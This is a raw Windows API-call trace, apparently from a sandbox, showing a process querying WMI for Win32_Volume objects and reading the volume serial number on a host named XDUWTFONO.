	[0172.679] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8076b0, riid=0x1c80caf0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cad0 | out: ppvObject=0x1c80cad0*=0x1c834788) returned 0x0
	[0172.679] WbemLocator:IUnknown:Release (This=0x1b8076b0) returned 0x3
	[0172.679] IUnknown:Release (This=0x1c834788) returned 0x2
	[0172.679] IUnknown:Release (This=0x1c834788) returned 0x1
	[0172.679] IUnknown:Release (This=0x1c8345f8) returned 0x2
	[0172.680] CoGetContextToken (in: pToken=0x1c80ce70 | out: pToken=0x1c80ce70) returned 0x0
	[0172.680] CoGetContextToken (in: pToken=0x1c80cdb0 | out: pToken=0x1c80cdb0) returned 0x0
	[0172.680] WbemLocator:IUnknown:AddRef (This=0x1b8076b0) returned 0x2
	[0172.680] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8076b0, riid=0x1c80cef0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ced0 | out: ppvObject=0x1c80ced0*=0x1c834788) returned 0x0
	[0172.681] WbemLocator:IUnknown:Release (This=0x1b8076b0) returned 0x2
	[0172.681] IUnknown:AddRef (This=0x1c834788) returned 0x3
	[0172.681] IEnumWbemClassObject:Reset (This=0x1c834788) returned 0x0
	[0172.689] IUnknown:Release (This=0x1c834788) returned 0x2
	[0172.695] CoTaskMemAlloc (cb=0x8) returned 0x1b80fee0
	[0172.696] IEnumWbemClassObject:Next (in: This=0x1c834788, lTimeout=-1, uCount=0x1, apObjects=0x1b80fee0, puReturned=0x1c80d0f8 | out: apObjects=0x1b80fee0*=0x1c834830, puReturned=0x1c80d0f8*=0x1) returned 0x0
	[0175.165] IUnknown:QueryInterface (in: This=0x1c834830, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c420 | out: ppvObject=0x1c80c420*=0x1c834830) returned 0x0
	[0175.165] IUnknown:QueryInterface (in: This=0x1c834830, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c4a0 | out: ppvObject=0x1c80c4a0*=0x0) returned 0x80004002
	[0175.165] IUnknown:QueryInterface (in: This=0x1c834830, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c238 | out: ppvObject=0x1c80c238*=0x0) returned 0x80004002
	[0175.166] IUnknown:AddRef (This=0x1c834830) returned 0x3
	[0175.166] CoGetContextToken (in: pToken=0x1c80c0f0 | out: pToken=0x1c80c0f0) returned 0x0
	[0175.166] IUnknown:QueryInterface (in: This=0x1c834830, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c0b0 | out: ppvObject=0x1c80c0b0*=0x1c834838) returned 0x0
	[0175.166] IMarshal:GetUnmarshalClass (in: This=0x1c834838, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c0e0 | out: pCid=0x1c80c0e0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0175.166] IUnknown:Release (This=0x1c834838) returned 0x3
	[0175.167] CoGetContextToken (in: pToken=0x1c80c0c0 | out: pToken=0x1c80c0c0) returned 0x0
	[0175.167] IUnknown:AddRef (This=0x1c834830) returned 0x4
	[0175.167] IUnknown:QueryInterface (in: This=0x1c834830, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c1d8 | out: ppvObject=0x1c80c1d8*=0x0) returned 0x80004002
	[0175.167] IUnknown:Release (This=0x1c834830) returned 0x3
	[0175.167] IUnknown:Release (This=0x1c834830) returned 0x2
	[0175.167] CoGetContextToken (in: pToken=0x1c80c580 | out: pToken=0x1c80c580) returned 0x0
	[0175.167] CoGetContextToken (in: pToken=0x1c80c4c0 | out: pToken=0x1c80c4c0) returned 0x0
	[0175.167] IUnknown:AddRef (This=0x1c834830) returned 0x3
	[0175.167] IUnknown:QueryInterface (in: This=0x1c834830, riid=0x1c80c600*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80c5e0 | out: ppvObject=0x1c80c5e0*=0x1c834830) returned 0x0
	[0175.167] IUnknown:Release (This=0x1c834830) returned 0x3
	[0175.167] IUnknown:Release (This=0x1c834830) returned 0x2
	[0175.168] IUnknown:Release (This=0x1c834830) returned 0x1
	[0175.168] CoTaskMemFree (pv=0x1b80fee0) 
	[0175.168] CoGetContextToken (in: pToken=0x1c80cf00 | out: pToken=0x1c80cf00) returned 0x0
	[0175.168] IUnknown:AddRef (This=0x1c834830) returned 0x2
	[0175.175] IWbemClassObject:Get (in: This=0x1c834830, wszName="__GENUS", lFlags=0, pVal=0x1c80d070*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d06c*=0, plFlavor=0x1c80d068*=0 | out: pVal=0x1c80d070*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d06c*=3, plFlavor=0x1c80d068*=64) returned 0x0
	[0175.197] IWbemClassObject:Get (in: This=0x1c834830, wszName="__PATH", lFlags=0, pVal=0x1c80d010*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d00c*=0, plFlavor=0x1c80d008*=0 | out: pVal=0x1c80d010*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c80d00c*=8, plFlavor=0x1c80d008*=64) returned 0x0
	[0175.197] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0175.197] CoGetObjectContext (in: riid=0x1c80cfa8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfa0 | out: ppv=0x1c80cfa0*=0x181868) returned 0x0
	[0175.197] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfc0 | out: pAptType=0x1c80cfc0*=1) returned 0x0
	[0175.197] IUnknown:QueryInterface (in: This=0x181868, riid=0x310f4c0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0c8 | out: ppvObject=0x1c80d0c8*=0x0) returned 0x80004002
	[0175.198] IUnknown:Release (This=0x181868) returned 0x1
	[0175.198] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c630 | out: ppv=0x1c80c630*=0x1c831720) returned 0x0
	[0175.198] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c831720, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c340 | out: ppvObject=0x1c80c340*=0x0) returned 0x80004002
	[0175.199] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c831720, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c328 | out: ppvObject=0x1c80c328*=0x1c837cf0) returned 0x0
	[0175.199] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c837cf0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c230 | out: ppvObject=0x1c80c230*=0x1c837cf0) returned 0x0
	[0175.199] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c837cf0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c2b0 | out: ppvObject=0x1c80c2b0*=0x0) returned 0x80004002
	[0175.199] WbemDefPath:IUnknown:AddRef (This=0x1c837cf0) returned 0x3
	[0175.199] CoGetContextToken (in: pToken=0x1c80bf00 | out: pToken=0x1c80bf00) returned 0x0
	[0175.199] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c837cf0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bec0 | out: ppvObject=0x1c80bec0*=0x1b810690) returned 0x0
	[0175.200] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b810690, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bef0 | out: pCid=0x1c80bef0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0175.200] WbemDefPath:IUnknown:Release (This=0x1b810690) returned 0x3
	[0175.200] CoGetContextToken (in: pToken=0x1c80bed0 | out: pToken=0x1c80bed0) returned 0x0
	[0175.200] WbemDefPath:IUnknown:AddRef (This=0x1c837cf0) returned 0x4
	[0175.200] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c837cf0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bfe8 | out: ppvObject=0x1c80bfe8*=0x0) returned 0x80004002
	[0175.200] WbemDefPath:IUnknown:Release (This=0x1c837cf0) returned 0x3
	[0175.200] WbemDefPath:IUnknown:Release (This=0x1c837cf0) returned 0x2
	[0175.200] WbemDefPath:IUnknown:Release (This=0x1c831720) returned 0x0
	[0175.200] WbemDefPath:IUnknown:Release (This=0x1c837cf0) returned 0x1
	[0175.201] CoGetContextToken (in: pToken=0x1c80cc00 | out: pToken=0x1c80cc00) returned 0x0
	[0175.201] CoGetContextToken (in: pToken=0x1c80cb40 | out: pToken=0x1c80cb40) returned 0x0
	[0175.201] WbemDefPath:IUnknown:AddRef (This=0x1c837cf0) returned 0x2
	[0175.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c837cf0, riid=0x1c80cc80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cc60 | out: ppvObject=0x1c80cc60*=0x1c837cf0) returned 0x0
	[0175.201] WbemDefPath:IUnknown:Release (This=0x1c837cf0) returned 0x2
	[0175.201] WbemDefPath:IUnknown:Release (This=0x1c837cf0) returned 0x1
	[0175.201] CoGetContextToken (in: pToken=0x1c80cd80 | out: pToken=0x1c80cd80) returned 0x0
	[0175.201] CoGetContextToken (in: pToken=0x1c80ccc0 | out: pToken=0x1c80ccc0) returned 0x0
	[0175.201] WbemDefPath:IUnknown:AddRef (This=0x1c837cf0) returned 0x2
	[0175.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c837cf0, riid=0x1c80ce00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cde0 | out: ppvObject=0x1c80cde0*=0x1c837cf0) returned 0x0
	[0175.201] WbemDefPath:IUnknown:Release (This=0x1c837cf0) returned 0x2
	[0175.202] WbemDefPath:IUnknown:AddRef (This=0x1c837cf0) returned 0x3
	[0175.202] WbemDefPath:IWbemPath:SetText (This=0x1c837cf0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x0
	[0175.202] WbemDefPath:IUnknown:Release (This=0x1c837cf0) returned 0x2
	[0175.202] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c821390, puCount=0x1c80d040 | out: puCount=0x1c80d040*=0x2) returned 0x0
	[0175.202] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d040*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d040*=0x17, pszText=0x0) returned 0x0
	[0175.202] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d040*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d040*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.202] CoTaskMemAlloc (cb=0x8) returned 0x1b80fee0
	[0175.202] IEnumWbemClassObject:Next (in: This=0x1c834788, lTimeout=-1, uCount=0x1, apObjects=0x1b80fee0, puReturned=0x1c80d0f8 | out: apObjects=0x1b80fee0*=0x0, puReturned=0x1c80d0f8*=0x0) returned 0x1
	[0175.237] CoTaskMemFree (pv=0x1b80fee0) 
	[0175.252] CoGetContextToken (in: pToken=0x1c80ce80 | out: pToken=0x1c80ce80) returned 0x0
	[0175.252] WbemLocator:IUnknown:Release (This=0x1b8076b0) returned 0x1
	[0175.253] IUnknown:Release (This=0x1c834788) returned 0x0
	[0175.299] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c821390, puCount=0x1c80d1a0 | out: puCount=0x1c80d1a0*=0x2) returned 0x0
	[0175.299] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1a0*=0x17, pszText=0x0) returned 0x0
	[0175.299] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.300] IWbemClassObject:Get (in: This=0x1c834830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d18c*=0, plFlavor=0x1c80d188*=0 | out: pVal=0x1c80d190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c80d18c*=8, plFlavor=0x1c80d188*=64) returned 0x0
	[0175.301] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0175.301] IWbemClassObject:Get (in: This=0x1c834830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64 | out: pVal=0x1c80d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64) returned 0x0
	[0175.301] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0175.301] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c821390, puCount=0x1c80d1a0 | out: puCount=0x1c80d1a0*=0x2) returned 0x0
	[0175.301] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d1a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1a0*=0x17, pszText=0x0) returned 0x0
	[0175.301] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d1a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.301] IWbemClassObject:Get (in: This=0x1c834830, wszName="__CLASS", lFlags=0, pVal=0x1c80d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d18c*=0, plFlavor=0x1c80d188*=0 | out: pVal=0x1c80d190*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c80d18c*=8, plFlavor=0x1c80d188*=64) returned 0x0
	[0175.302] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0175.302] IWbemClassObject:Get (in: This=0x1c834830, wszName="__CLASS", lFlags=0, pVal=0x1c80d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64 | out: pVal=0x1c80d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c80d19c*=8, plFlavor=0x1c80d198*=64) returned 0x0
	[0175.302] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0175.372] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c821390, puCount=0x1c80d130 | out: puCount=0x1c80d130*=0x2) returned 0x0
	[0175.372] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d130*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d130*=0x17, pszText=0x0) returned 0x0
	[0175.372] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.372] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c821390, puCount=0x1c80d130 | out: puCount=0x1c80d130*=0x2) returned 0x0
	[0175.372] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d130*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d130*=0x17, pszText=0x0) returned 0x0
	[0175.372] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.376] IWbemClassObject:GetNames (in: This=0x1c834830, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c80d128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c80d120 | out: pNames=0x1c80d120*="\x01ƀ\x08") returned 0x0
	[0175.376] SafeArrayGetDim (psa=0x1b813a50) returned 0x1
	[0175.377] IWbemClassObject:Get (in: This=0x1c834830, wszName="__GENUS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d11c*=3, plFlavor=0x1c80d118*=64) returned 0x0
	[0175.377] IWbemClassObject:Get (in: This=0x1c834830, wszName="__CLASS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0175.377] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0175.377] IWbemClassObject:Get (in: This=0x1c834830, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_StorageVolume", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0175.387] SysStringLen (param_1="CIM_StorageVolume") returned 0x11
	[0175.387] IWbemClassObject:Get (in: This=0x1c834830, wszName="__DYNASTY", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0175.387] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0175.387] IWbemClassObject:Get (in: This=0x1c834830, wszName="__RELPATH", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0175.387] SysStringLen (param_1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x4d
	[0175.387] IWbemClassObject:Get (in: This=0x1c834830, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), pType=0x1c80d11c*=3, plFlavor=0x1c80d118*=64) returned 0x0
	[0175.387] IWbemClassObject:Get (in: This=0x1c834830, wszName="__DERIVATION", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b813690*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b80c530, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x1c80d11c*=8200, plFlavor=0x1c80d118*=64) returned 0x0
	[0175.399] IWbemClassObject:Get (in: This=0x1c834830, wszName="__SERVER", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0175.399] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0175.400] IWbemClassObject:Get (in: This=0x1c834830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0175.400] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0175.400] IWbemClassObject:Get (in: This=0x1c834830, wszName="__PATH", lFlags=0, pVal=0x1c80d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d11c*=0, plFlavor=0x1c80d118*=0 | out: pVal=0x1c80d120*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c80d11c*=8, plFlavor=0x1c80d118*=64) returned 0x0
	[0175.400] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0175.400] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c821390, puCount=0x1c80d1c0 | out: puCount=0x1c80d1c0*=0x2) returned 0x0
	[0175.400] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d1c0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d1c0*=0x17, pszText=0x0) returned 0x0
	[0175.400] WbemDefPath:IWbemPath:GetText (in: This=0x1c821390, lFlags=4, puBuffLength=0x1c80d1c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d1c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.400] IWbemClassObject:Get (in: This=0x1c834830, wszName="SerialNumber", lFlags=0, pVal=0x1c80d1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d1ac*=0, plFlavor=0x1c80d1a8*=0 | out: pVal=0x1c80d1b0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x1c80d1ac*=19, plFlavor=0x1c80d1a8*=0) returned 0x0
